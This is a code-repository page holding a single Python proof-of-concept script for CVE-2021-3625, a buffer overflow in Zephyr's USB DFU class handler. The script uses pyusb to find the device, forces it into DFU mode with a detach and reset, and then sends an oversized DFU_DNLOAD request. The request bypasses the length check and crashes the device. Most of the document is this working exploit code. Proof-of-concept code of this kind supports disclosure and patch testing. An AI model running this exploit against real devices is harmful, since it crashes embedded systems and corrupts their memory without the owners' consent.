STRLCPY/zephyr_cve-2021-3625

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

Total 1 files

■ ■ ■ ■ ■ ■

dfu_overflow.py

1	+	#!/usr/bin/python3
2	+
3	+	#
4	+	# CVE-2021-3625 POC
5	+	#
6	+	# DFU buffer overflow
7	+	#
8	+	# https://www.usb.org/sites/default/files/DFU_1.1.pdf
9	+	#
10	+
11	+	import sys
12	+
13	+	import usb.core
14	+
15	+	# get the device
16	+	usbdev = usb.core.find(idVendor=0x2fe3, idProduct=0x0100)
17	+
18	+	DFU_DETACH = 0x00
19	+	DFU_DETACH_TIMEOUT = 0xff
20	+	DFU_DNLOAD = 0x01
21	+
22	+	bmRequestType = (1 << 7) \| (1 << 5)
23	+	wValue = 0x00
24	+	wIndex = 0x00
25	+	length = 0xffff
26	+
27	+	# Need to switch to DFU mode
28	+	# First issue a detach command
29	+	try:
30	+	data = usbdev.ctrl_transfer(bmRequestType, DFU_DETACH, DFU_DETACH_TIMEOUT, wIndex, 0)
31	+	except:
32	+	pass
33	+
34	+	# Followed by a reset request
35	+	try:
36	+	usbdev.reset()
37	+	except:
38	+	pass
39	+
40	+	# Wait till device is switched to DFU mode
41	+	usbdev = None
42	+	while usbdev is None:
43	+	usbdev = usb.core.find(idVendor=0x2fe3, idProduct=0xffff)
44	+
45	+	# Trigger DFU class handler overflow - bypass len check by use of direction to host
46	+	try:
47	+	usbdev.ctrl_transfer(bmRequestType, DFU_DNLOAD, wValue, wIndex, length)
48	+	except usb.core.USBTimeoutError:
49	+	print('Device is now crashed due to triggered buffer overflow')
50	+